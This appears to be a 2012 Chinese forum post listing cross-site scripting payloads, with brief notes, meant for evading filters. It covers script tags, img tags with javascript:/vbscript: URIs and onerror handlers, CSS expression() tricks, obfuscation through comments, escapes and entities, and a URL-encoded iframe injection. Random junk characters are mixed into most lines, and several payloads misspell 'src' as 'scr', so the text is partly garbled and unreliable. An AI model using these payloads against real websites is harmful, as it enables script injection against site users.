<script>alert("跨站")</script> (最常用)" o/ r6 A* g* K1 |& {9 l
<img scr=javascript:alert("跨站")></img>) K( P2 S. K9 o: q5 m
<img scr="javascript: alert(/跨站/)></img>+ B% R% R$ _' E# N
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
4 ~5 c" U$ P' s0 X( ^<img scr="#" onerror=alert(/跨站/)></img>: n% w! k9 I( i$ k- a
<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 j8 W4 T9 ? [. R! y0 Y<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
" F. G& e* G! \ b1 Y- W4 B<img src=vbscript:msgbox ("xss")></img>
6 @9 v% V% T/ G% H4 [. z. \% S<style> input {left:expression (alert('xss'))}</style>
' }, n* k& R0 N& O7 b<div style={left:expression (alert('xss'))}></div>+ G; P1 w$ j0 t
<div style={left:exp/* */ression (alert('xss'))}></div> G: G/ p1 _: C7 W3 D j
<div style={left:\0065\0078ression (alert('xss'))}></div> x; X6 c3 V3 C
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
6 K; ~: T; q/ Xunicode <div style="{left:expRessioN (alert('xss'))}">8 @ s% w3 M Q' z" H$ N5 ?
+ c' U& B' b- Z! [: @% [5 ["]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["4 n9 H0 `! Q- M# e4 M" l' A) J- g1 u3 T
|
发表于 2012-9-13 17:15:04
收藏
支持
反对